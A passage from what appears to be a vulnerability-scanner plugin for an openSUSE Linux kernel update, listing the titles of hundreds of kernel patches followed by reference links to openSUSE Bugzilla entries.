completion on\n unregistering LED class device (bnc#1012382).\n\n - libata: whitelist all SAMSUNG MZ7KM* solid-state disks\n (bnc#1012382).\n\n - libceph: fall back to sendmsg for slab pages\n (bsc#1118316).\n\n - libfc: sync strings with upstream versions\n (bsc#1114763).\n\n - lib/interval_tree_test.c: allow full tree search\n (bnc#1012382).\n\n - lib/interval_tree_test.c: allow users to limit scope of\n endpoint (bnc#1012382).\n\n - lib/interval_tree_test.c: make test options module\n parameters (bnc#1012382).\n\n - libnvdimm, (btt, blk): do integrity setup before\n add_disk() (bsc#1118926).\n\n - libnvdimm, dimm: fix dpa reservation vs uninitialized\n label area (bsc#1118936).\n\n - libnvdimm: fix integer overflow static analysis warning\n (bsc#1118922).\n\n - libnvdimm: fix nvdimm_bus_lock() vs device_lock()\n ordering (bsc#1118915).\n\n - lib/rbtree_test.c: make input module parameters\n (bnc#1012382).\n\n - lib/rbtree-test: lower default params (bnc#1012382).\n\n - llc: do not use sk_eat_skb() (bnc#1012382).\n\n - loop: Fix double mutex_unlock(&loop_ctl_mutex) in\n loop_control_ioctl() (bnc#1012382).\n\n - loop: Fold __loop_release into loop_release\n (bnc#1012382).\n\n - loop: Get rid of loop_index_mutex (bnc#1012382).\n\n - LSM: Check for NULL cred-security on free (bnc#1012382).\n\n - mac80211: Clear beacon_int in ieee80211_do_stop\n (bnc#1012382).\n\n - mac80211: fix reordering of buffered broadcast packets\n (bnc#1012382).\n\n - mac80211_hwsim: fix module init error paths for netlink\n (bnc#1012382).\n\n - mac80211_hwsim: Timer should be initialized before\n device registered (bnc#1012382).\n\n - mac80211: ignore NullFunc frames in the duplicate\n detection (bnc#1012382).\n\n - mac80211: ignore tx status for PS stations in\n ieee80211_tx_status_ext (bnc#1012382).\n\n - matroxfb: fix size of memcpy (bnc#1012382).\n\n - md: batch flush requests (bsc#1119680).\n\n - md: do not check MD_SB_CHANGE_CLEAN in md_allow_write\n (Git-fixes).\n\n - media: dvb-frontends: fix i2c access helpers for KASAN\n (bnc#1012382).\n\n - media: em28xx: Fix misplaced reset of\n dev->v4l::field_count (bnc#1012382).\n\n - media: em28xx: Fix use-after-free when disconnecting\n (bnc#1012382).\n\n - media: firewire: Fix app_info parameter type in\n avc_ca(,_app)_info (bnc#1012382).\n\n - media: vb2: be sure to unlock mutex on errors\n (bnc#1012382).\n\n - media: vb2: vb2_mmap: move lock up (bnc#1012382).\n\n - media: vivid: fix error handling of kthread_run\n (bnc#1012382).\n\n - media: vivid: free bitmap_cap when updating\n std/timings/etc (bnc#1012382).\n\n - media: vivid: set min width/height to a value > 0\n (bnc#1012382).\n\n - mfd: tps6586x: Handle interrupts on suspend\n (bnc#1012382).\n\n - mips: Align kernel load address to 64KB (bnc#1012382).\n\n - mips: Ensure pmd_present() returns false after\n pmd_mknotpresent() (bnc#1012382).\n\n - mips: fix mips_get_syscall_arg o32 check (bnc#1012382).\n\n - mips: fix n32 compat_ipc_parse_version (bnc#1012382).\n\n - mips: ralink: Fix mt7620 nd_sd pinmux (bnc#1012382).\n\n - MIPS: SiByte: Enable swiotlb for SWARM, LittleSur and\n BigSur (bnc#1012382).\n\n - misc: mic/scif: fix copy-paste error in\n scif_create_remote_lookup (bnc#1012382).\n\n - mmc: atmel-mci: do not assume idle after\n atmci_request_end (bnc#1012382).\n\n - mmc: core: Reset HPI enabled state during re-init and in\n case of errors (bnc#1012382).\n\n - mm: cleancache: fix corruption on missed inode\n invalidation (bnc#1012382).\n\n - MMC: OMAP: fix broken MMC on OMAP15XX/OMAP5910/OMAP310\n (bnc#1012382).\n\n - mmc: omap_hsmmc: fix DMA API warning (bnc#1012382).\n\n - mm, devm_memremap_pages: kill mapping 'System RAM'\n support (bnc#1012382).\n\n - mm: do not miss the last page because of round-off error\n (bnc#1118798).\n\n - mm, hugetlb: fix huge_pte_alloc BUG_ON (bsc#1119204).\n\n - mm: hwpoison: call shake_page() after try_to_unmap() for\n mlocked page (bnc#1116336).\n\n - mm: lower the printk loglevel for __dump_page messages\n (generic hotplug debugability).\n\n - mm, memory_hotplug: be more verbose for memory offline\n failures (generic hotplug debugability).\n\n - mm, memory_hotplug: drop pointless block alignment\n checks from __offline_pages (generic hotplug\n debugability).\n\n - mm, memory_hotplug: print reason for the offlining\n failure (generic hotplug debugability).\n\n - mm: mlock: avoid increase mm->locked_vm on mlock() when\n already mlock2(,MLOCK_ONFAULT) (bnc#1012382).\n\n - mm/nommu.c: Switch __get_user_pages_unlocked() to use\n __get_user_pages() (bnc#1012382).\n\n - mm: only report isolation failures when offlining memory\n (generic hotplug debugability).\n\n - mm/page-writeback.c: do not break integrity writeback on\n ->writepage() error (bnc#1012382).\n\n - mm: Preserve _PAGE_DEVMAP across mprotect() calls\n (bsc#1118790).\n\n - mm: print more information about mapping in __dump_page\n (generic hotplug debugability).\n\n - mm, proc: be more verbose about unstable VMA flags in\n /proc/<pid>/smaps (bnc#1012382).\n\n - mm: put_and_wait_on_page_locked() while page is migrated\n (bnc#1109272).\n\n - mm: remove write/force parameters from\n __get_user_pages_locked() (bnc#1012382 bsc#1027260).\n\n - mm: remove write/force parameters from\n __get_user_pages_unlocked() (bnc#1012382 bsc#1027260).\n\n - mm: replace __access_remote_vm() write parameter with\n gup_flags (bnc#1012382).\n\n - mm: replace access_remote_vm() write parameter with\n gup_flags (bnc#1012382).\n\n - mm: replace get_user_pages_locked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages_unlocked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages() write/force parameters with\n gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_vaddr_frames() write/force parameters\n with gup_flags (bnc#1012382).\n\n - mm, slab: faster active and free stats (bsc#116653, VM\n Performance).\n\n - mm/slab: improve performance of gathering slabinfo stats\n (bsc#116653, VM Performance).\n\n - mm, slab: maintain total slab count instead of active\n count (bsc#116653, VM Performance).\n\n - Move patches to sorted range, p1\n\n - mv88e6060: disable hardware level MAC learning\n (bnc#1012382).\n\n - mwifiex: Fix NULL pointer dereference in skb_dequeue()\n (bnc#1012382).\n\n - mwifiex: fix p2p device does not find in scan problem\n (bnc#1012382).\n\n - namei: allow restricted O_CREAT of FIFOs and regular\n files (bnc#1012382).\n\n - neighbour: Avoid writing before skb->head in\n neigh_hh_output() (bnc#1012382).\n\n - net: 8139cp: fix a BUG triggered by changing mtu with\n network traffic (bnc#1012382).\n\n - net: amd: add missing of_node_put() (bnc#1012382).\n\n - net: bcmgenet: fix OF child-node lookup (bnc#1012382).\n\n - net: bridge: fix a bug on using a neighbour cache entry\n without checking its state (bnc#1012382).\n\n - net: call sk_dst_reset when set SO_DONTROUTE\n (bnc#1012382).\n\n - net: ena: fix crash during ena_remove() (bsc#1108240).\n\n - net: ena: update driver version from 2.0.1 to 2.0.2\n (bsc#1108240).\n\n - net: faraday: ftmac100: remove netif_running(netdev)\n check before disabling interrupts (bnc#1012382).\n\n - netfilter: nf_tables: fix oops when inserting an element\n into a verdict map (bnc#1012382).\n\n - net: hisilicon: remove unexpected free_netdev\n (bnc#1012382).\n\n - net/ibmvnic: Fix RTNL deadlock during device reset\n (bnc#1115431).\n\n - net: ipv4: do not handle duplicate fragments as\n overlapping (bsc#1116345).\n\n - net/mlx4_core: Correctly set PFC param if global pause\n is turned off (bsc#1015336 bsc#1015337 bsc#1015340).\n\n - net/mlx4_core: Fix uninitialized variable compilation\n warning (bnc#1012382).\n\n - net/mlx4_core: Zero out lkey field in SW2HW_MPT fw\n command (bnc#1012382).\n\n - net/mlx4: Fix UBSAN warning of signed integer overflow\n (bnc#1012382).\n\n - net: phy: do not allow __set_phy_supported to add\n unsupported modes (bnc#1012382).\n\n - net: Prevent invalid access to skb->prev in\n __qdisc_drop_all (bnc#1012382).\n\n - netrom: fix locking in nr_find_socket() (bnc#1012382).\n\n - net: speed up skb_rbtree_purge() (bnc#1012382).\n\n - net: thunderx: fix NULL pointer dereference in\n nic_remove (bnc#1012382).\n\n - nfc: nfcmrvl_uart: fix OF child-node lookup\n (bnc#1012382).\n\n - nfit: skip region registration for incomplete control\n regions (bsc#1118930).\n\n - nfsv4: Do not exit the state manager without clearing\n NFS4CLNT_MANAGER_RUNNING (git-fixes).\n\n - nvme: validate controller state before rescheduling keep\n alive (bsc#1103257).\n\n - ocfs2: fix deadlock caused by ocfs2_defrag_extent()\n (bnc#1012382).\n\n - ocfs2: fix panic due to unrecovered local alloc\n (bnc#1012382).\n\n - ocfs2: fix potential use after free (bnc#1012382).\n\n - of: add helper to lookup compatible child node\n (bnc#1012382).\n\n - omap2fb: Fix stack memory disclosure (bsc#1106929)\n\n - packet: Do not leak dev refcounts on error exit\n (bnc#1012382).\n\n - packet: validate address length (bnc#1012382).\n\n - packet: validate address length if non-zero\n (bnc#1012382).\n\n - pci: altera: Check link status before retrain link\n (bnc#1012382).\n\n - pci: altera: Fix altera_pcie_link_is_up() (bnc#1012382).\n\n - pci: altera: Move retrain from fixup to\n altera_pcie_host_init() (bnc#1012382).\n\n - pci: altera: Poll for link training status after\n retraining the link (bnc#1012382).\n\n - pci: altera: Poll for link up status after retraining\n the link (bnc#1012382).\n\n - pci: altera: Reorder read/write functions (bnc#1012382).\n\n - pci: altera: Rework config accessors for use without a\n struct pci_bus (bnc#1012382).\n\n - perf/bpf: Convert perf_event_array to use struct file\n (bsc#1119967).\n\n - perf intel-pt: Fix error with config term 'pt=0'\n (bnc#1012382).\n\n - perf parse-events: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - perf pmu: Suppress potential format-truncation warning\n (bnc#1012382).\n\n - perf svghelper: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - pinctrl: sunxi: a83t: Fix IRQ offset typo for PH11\n (bnc#1012382).\n\n - platform/x86: asus-wmi: Tell the EC the OS will handle\n the display off hotkey (bnc#1012382).\n\n - powerpc/64s: consolidate MCE counter increment\n (bsc#1094244).\n\n - powerpc/boot: Fix random libfdt related build errors\n (bnc#1012382).\n\n - powerpc/boot: Request no dynamic linker for boot wrapper\n (bsc#1070805).\n\n - powerpc/cacheinfo: Report the correct shared_cpu_map on\n big-cores (bsc#1109695).\n\n - powerpc: Detect the presence of big-cores via 'ibm,\n thread-groups' (bsc#1109695).\n\n - powerpc: Fix COFF zImage booting on old powermacs\n (bnc#1012382).\n\n - powerpc, hotplug: Avoid to touch non-existent cpumasks\n (bsc#1109695).\n\n - powerpc: make use of for_each_node_by_type() instead of\n open-coding it (bsc#1109695).\n\n - powerpc/msi: Fix NULL pointer access in teardown code\n (bnc#1012382).\n\n - powerpc/numa: Suppress 'VPHN is not supported' messages\n (bnc#1012382).\n\n - powerpc/pseries/cpuidle: Fix preempt warning\n (bnc#1012382).\n\n - powerpc/setup: Add cpu_to_phys_id array (bsc#1109695).\n\n - powerpc/smp: Add cpu_l2_cache_map (bsc#1109695).\n\n - powerpc/smp: Add Power9 scheduler topology\n (bsc#1109695).\n\n - powerpc/smp: Rework CPU topology construction\n (bsc#1109695).\n\n - powerpc/smp: Use cpu_to_chip_id() to find core siblings\n (bsc#1109695).\n\n - powerpc/traps: restore recoverability of machine_check\n interrupts (bsc#1094244).\n\n - powerpc: Use cpu_smallcore_sibling_mask at SMT level on\n bigcores (bsc#1109695).\n\n - powerpc/xmon: Fix invocation inside lock region\n (bsc#1122885).\n\n - power: supply: olpc_battery: correct the temperature\n units (bnc#1012382).\n\n - proc: Remove empty line in /proc/self/status\n (bnc#1012382 bsc#1094823).\n\n - pstore: Convert console write to use ->write_buf\n (bnc#1012382).\n\n - pstore/ram: Do not treat empty buffers as valid\n (bnc#1012382).\n\n - qed: Fix bitmap_weight() check (bsc#1019695).\n\n - qed: Fix PTT leak in qed_drain() (bnc#1012382).\n\n - qed: Fix QM getters to always return a valid pq\n (bsc#1019695 ).\n\n - qed: Fix reading wrong value in loop condition\n (bnc#1012382).\n\n - r8169: Add support for new Realtek Ethernet\n (bnc#1012382).\n\n - rapidio/rionet: do not free skb before reading its\n length (bnc#1012382).\n\n - Refresh\n patches.kabi/x86-cpufeature-preserve-numbers.patch.\n (bsc#1122651)\n\n - Revert 'drm/rockchip: Allow driver to be shutdown on\n reboot/kexec' (bsc#1106929)\n\n - Revert 'exec: avoid gcc-8 warning for get_task_comm'\n (kabi).\n\n - Revert 'iommu/io-pgtable-arm: Check for v7s-incapable\n systems' (bsc#1106105).\n\n - Revert 'PCI/ASPM: Do not initialize link state when\n aspm_disabled is set' (bsc#1106105).\n\n - Revert 'usb: musb: musb_host: Enable HCD_BH flag to\n handle urb return in bottom half' (bsc#1047487).\n\n - Revert 'wlcore: Add missing PM call for\n wlcore_cmd_wait_for_event_or_timeout()' (bnc#1012382).\n\n - rocker: fix rocker_tlv_put_* functions for KASAN\n (bnc#1012382).\n\n - rtc: snvs: add a missing write sync (bnc#1012382).\n\n - rtc: snvs: Add timeouts to avoid kernel lockups\n (bnc#1012382).\n\n - rtnetlink: ndo_dflt_fdb_dump() only work for\n ARPHRD_ETHER devices (bnc#1012382).\n\n - s390/cpum_cf: Reject request for sampling in event\n initialization (bnc#1012382).\n\n - s390/mm: Check for valid vma before zapping in\n gmap_discard (bnc#1012382).\n\n - s390/qeth: fix length check in SNMP processing\n (bnc#1012382).\n\n - sbus: char: add of_node_put() (bnc#1012382).\n\n - scsi: bfa: convert to strlcpy/strlcat (bnc#1012382\n bsc#1019683, ).\n\n - scsi: bnx2fc: Fix NULL dereference in error handling\n (bnc#1012382).\n\n - scsi: Create two versions of\n scsi_internal_device_unblock() (bsc#1119877).\n\n - scsi: csiostor: Avoid content leaks and casts\n (bnc#1012382).\n\n - scsi: Introduce scsi_start_queue() (bsc#1119877).\n\n - scsi: libiscsi: Fix NULL pointer dereference in\n iscsi_eh_session_reset (bnc#1012382).\n\n - scsi: lpfc: Add Buffer overflow check, when nvme_info\n larger than PAGE_SIZE (bsc#1102660).\n\n - scsi: lpfc: devloss timeout race condition caused NULL\n pointer reference (bsc#1102660).\n\n - scsi: lpfc: Fix abort error path for NVMET\n (bsc#1102660).\n\n - scsi: lpfc: fix block guard enablement on SLI3 adapters\n (bsc#1079935).\n\n - scsi: lpfc: Fix driver crash when re-registering NVME\n rports (bsc#1102660).\n\n - scsi: lpfc: Fix ELS abort on SLI-3 adapters\n (bsc#1102660).\n\n - scsi: lpfc: Fix list corruption on the completion queue\n (bsc#1102660).\n\n - scsi: lpfc: Fix NVME Target crash in defer rcv logic\n (bsc#1102660).\n\n - scsi: lpfc: Fix panic if driver unloaded when port is\n offline (bsc#1102660).\n\n - scsi: lpfc: update driver version to 11.4.0.7-5\n (bsc#1102660).\n\n - scsi: Make __scsi_remove_device go straight from BLOCKED\n to DEL (bsc#1119877).\n\n - scsi: megaraid: fix out-of-bound array accesses\n (bnc#1012382).\n\n - scsi: Protect SCSI device state changes with a mutex\n (bsc#1119877).\n\n - scsi: qedi: Add ISCSI_BOOT_SYSFS to Kconfig\n (bsc#1043083).\n\n - scsi: Re-export scsi_internal_device_(,un)_block()\n (bsc#1119877).\n\n - scsi: sd: Fix cache_type_store() (bnc#1012382).\n\n - scsi: Split scsi_internal_device_block() (bsc#1119877).\n\n - scsi: target: add emulate_pr backstore attr to toggle PR\n support (bsc#1091405).\n\n - scsi: target: drop unused pi_prot_format attribute\n storage (bsc#1091405).\n\n - scsi: target: use consistent left-aligned ASCII INQUIRY\n data (bnc#1012382).\n\n - scsi: ufs: fix bugs related to NULL pointer access and\n array size (bnc#1012382).\n\n - scsi: ufs: fix race between clock gating and devfreq\n scaling work (bnc#1012382).\n\n - scsi: ufshcd: Fix race between clk scaling and ungate\n work (bnc#1012382).\n\n - scsi: ufshcd: release resources if probe fails\n (bnc#1012382).\n\n - scsi: use 'inquiry_mutex' instead of 'state_mutex'\n (bsc#1119877).\n\n - scsi: vmw_pscsi: Rearrange code to avoid multiple calls\n to free_irq during unload (bnc#1012382).\n\n - scsi: zfcp: fix posting too many status read buffers\n leading to adapter shutdown (bnc#1012382).\n\n - sctp: allocate sctp_sockaddr_entry with kzalloc\n (bnc#1012382).\n\n - sctp: clear the transport of some out_chunk_list chunks\n in sctp_assoc_rm_peer (bnc#1012382).\n\n - sctp: initialize sin6_flowinfo for ipv6 addrs in\n sctp_inet6addr_event (bnc#1012382).\n\n - selftests: Move networking/timestamping from\n Documentation (bnc#1012382).\n\n - selinux: fix GPF on invalid policy (bnc#1012382).\n\n - seq_file: fix incomplete reset on read from zero offset\n (Git-fixes).\n\n - series.conf: Move\n 'patches.fixes/aio-hold-an-extra-file-reference-over-AIO\n -read-write.patch' into sorted section.\n\n - slab: alien caches must not be initialized if the\n allocation of the alien cache failed (bnc#1012382).\n\n - sock: Make sock->sk_stamp thread-safe (bnc#1012382).\n\n - spi: bcm2835: Avoid finishing transfer prematurely in\n IRQ mode (bnc#1012382).\n\n - spi: bcm2835: Fix book-keeping of DMA termination\n (bnc#1012382).\n\n - spi: bcm2835: Fix race on DMA termination (bnc#1012382).\n\n - spi: bcm2835: Unbreak the build of esoteric configs\n (bnc#1012382).\n\n - sr: pass down correctly sized SCSI sense buffer\n (bnc#1012382).\n\n - Staging: lustre: remove two build warnings\n (bnc#1012382).\n\n - staging: rts5208: fix gcc-8 logic error warning\n (bnc#1012382).\n\n - staging: speakup: Replace strncpy with memcpy\n (bnc#1012382).\n\n - sunrpc: Fix a bogus get/put in generic_key_to_expire()\n (bnc#1012382).\n\n - sunrpc: Fix a potential race in xprt_connect()\n (git-fixes).\n\n - sunrpc: fix cache_head leak due to queued request\n (bnc#1012382).\n\n - sunrpc: Fix leak of krb5p encode pages (bnc#1012382).\n\n - sunrpc: handle ENOMEM in rpcb_getport_async\n (bnc#1012382).\n\n - swiotlb: clean up reporting (bnc#1012382).\n\n - sysfs: Disable lockdep for driver bind/unbind files\n (bnc#1012382).\n\n - sysv: return 'err' instead of 0 in __sysv_write_inode\n (bnc#1012382).\n\n - target/iscsi: avoid NULL dereference in CHAP auth error\n path (bsc#1117165).\n\n - target: se_dev_attrib.emulate_pr ABI stability\n (bsc#1091405).\n\n - tcp: fix NULL ref in tail loss probe (bnc#1012382).\n\n - timer/debug: Change /proc/timer_list from 0444 to 0400\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_bearer_enable\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_doit\n (bnc#1012382).\n\n - tipc: fix uninit-value in\n tipc_nl_compat_link_reset_stats (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_link_set\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_name_table_dump\n (bnc#1012382).\n\n - tmpfs: make lseek(SEEK_DATA/SEK_HOLE) return ENXIO with\n a negative offset (bnc#1012382).\n\n - tpm: fix response size validation in tpm_get_random()\n (bsc#1020645, git-fixes).\n\n - tracing: Fix bad use of igrab in trace_uprobe.c\n (bsc#1120046).\n\n - tracing: Fix memory leak in set_trigger_filter()\n (bnc#1012382).\n\n - tracing: Fix memory leak of instance function hash\n filters (bnc#1012382).\n\n - tty/ldsem: Wake up readers after timed out down_write()\n (bnc#1012382).\n\n - tty: serial: 8250_mtk: always resume the device in probe\n (bnc#1012382).\n\n - tty: wipe buffer (bnc#1012382).\n\n - tty: wipe buffer if not echoing data (bnc#1012382).\n\n - tun: forbid iface creation with rtnl ops (bnc#1012382).\n\n - unifdef: use memcpy instead of strncpy (bnc#1012382).\n\n - Update config files: disable f2fs in the rest configs\n (boo#1109665)\n\n - uprobes: Fix handle_swbp() vs. unregister() + register()\n race once more (bnc#1012382).\n\n - usb: Add USB_QUIRK_DELAY_CTRL_MSG quirk for Corsair K70\n RGB (bnc#1012382).\n\n - usb: appledisplay: Add 27' Apple Cinema Display\n (bnc#1012382).\n\n - usb: cdc-acm: send ZLP for Telit 3G Intel based modems\n (bnc#1012382).\n\n - usb: check usb_get_extra_descriptor for proper size\n (bnc#1012382).\n\n - usb: core: Fix hub port connection events lost\n (bnc#1012382).\n\n - usb: core: quirks: add RESET_RESUME quirk for Cherry\n G230 Stream series (bnc#1012382).\n\n - usb: gadget: dummy: fix nonsensical comparisons\n (bnc#1012382).\n\n - usbnet: ipheth: fix potential recvmsg bug and recvmsg\n bug 2 (bnc#1012382).\n\n - usb: omap_udc: fix crashes on probe error and module\n removal (bnc#1012382).\n\n - usb: omap_udc: fix omap_udc_start() on 15xx machines\n (bnc#1012382).\n\n - usb: omap_udc: fix USB gadget functionality on Palm\n Tungsten E (bnc#1012382).\n\n - usb: omap_udc: use devm_request_irq() (bnc#1012382).\n\n - usb: quirk: add no-LPM quirk on SanDisk Ultra Flair\n device (bnc#1012382).\n\n - usb: r8a66597: Fix a possible concurrency use-after-free\n bug in r8a66597_endpoint_disable() (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL668 series\n (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL678 series\n (bnc#1012382).\n\n - usb: serial: option: add GosunCn ZTE WeLink ME3630\n (bnc#1012382).\n\n - usb: serial: option: add HP lt4132 (bnc#1012382).\n\n - usb: serial: option: add Simcom SIM7500/SIM7600 (MBIM\n mode) (bnc#1012382).\n\n - usb: serial: option: add Telit LN940 series\n (bnc#1012382).\n\n - usb: serial: pl2303: add ids for Hewlett-Packard HP POS\n pole displays (bnc#1012382).\n\n - usb: storage: add quirk for SMI SM3350 (bnc#1012382).\n\n - usb: storage: do not insert sane sense for SPC3+ when\n bad sense specified (bnc#1012382).\n\n - usb: usb-storage: Add new IDs to ums-realtek\n (bnc#1012382).\n\n - usb: xhci: fix timeout for transition from RExit to U0\n (bnc#1012382).\n\n - usb: xhci: fix uninitialized completion when USB3 port\n got wrong status (bnc#1012382).\n\n - usb: xhci: Prevent bus suspend if a port connect change\n or polling state is detected (bnc#1012382).\n\n - v9fs_dir_readdir: fix double-free on p9stat_read error\n (bnc#1012382).\n\n - vfs: Avoid softlockups in drop_pagecache_sb()\n (bsc#1118505).\n\n - vhost: make sure used idx is seen before log in\n vhost_add_used_n() (bnc#1012382).\n\n - virtio/s390: avoid race on vcdev->config (bnc#1012382).\n\n - virtio/s390: fix race in ccw_io_helper() (bnc#1012382).\n\n - VSOCK: Send reset control packet when socket is\n partially bound (bnc#1012382).\n\n - writeback: do not decrement wb->refcnt if !wb->bdi (git\n fixes (writeback)).\n\n - x86/earlyprintk/efi: Fix infinite loop on some screen\n widths (bnc#1012382).\n\n - x86/entry: spell EBX register correctly in documentation\n (bnc#1012382).\n\n - x86/MCE: Export memory_error() (bsc#1114648).\n\n - x86/MCE: Make correctable error detection look at the\n Deferred bit (bsc#1114648).\n\n - x86/mtrr: Do not copy uninitialized gentry fields back\n to userspace (bnc#1012382).\n\n - x86/speculation/l1tf: Drop the swap storage limit\n restriction when l1tf=off (bnc#1114871).\n\n - x86/speculation: Use synthetic bits for IBRS/IBPB/STIBP\n (bnc#1012382).\n\n - xen/balloon: Support xend-based toolstack (bnc#1065600).\n\n - xen/netback: dont overflow meta array (bnc#1099523).\n\n - xen/netfront: tolerate frags with no data (bnc#1012382).\n\n - xen/x86: add diagnostic printout to xen_mc_flush() in\n case of error (bnc#1116183).\n\n - xen: xlate_mmu: add missing header to fix 'W=1' warning\n (bnc#1012382).\n\n - xfrm: Fix bucket count reported to userspace\n (bnc#1012382).\n\n - xfs: Align compat attrlist_by_handle with native\n implementation (git-fixes).\n\n - xfs: fix quotacheck dquot id overflow infinite loop\n (bsc#1121621).\n\n - xhci: Add quirk to workaround the errata seen on Cavium\n Thunder-X2 Soc (bsc#1117162).\n\n - xhci: Do not prevent USB2 bus suspend in state check\n intended for USB3 only (bnc#1012382).\n\n - xhci: Prevent U1/U2 link pm states if exit latency is\n too long (bnc#1012382).\n\n - xprtrdma: Reset credit grant properly after a disconnect\n (git-fixes).\n\n - xtensa: enable coprocessors that are being flushed\n (bnc#1012382).\n\n - xtensa: fix coprocessor context offset definitions\n (bnc#1012382).\n\n - Yama: Check for pid death before checking ancestry\n (bnc#1012382).\n\n - x86/pkeys: Properly copy pkey state at fork()\n (bsc#1106105).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1023175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1027260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1031492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1043083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1065600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1068032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079935\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1086423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1087082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1091405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094244\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096281\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1099523\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1103156\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1103257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1106105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1106929\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1107866\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1110286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114648\"\n 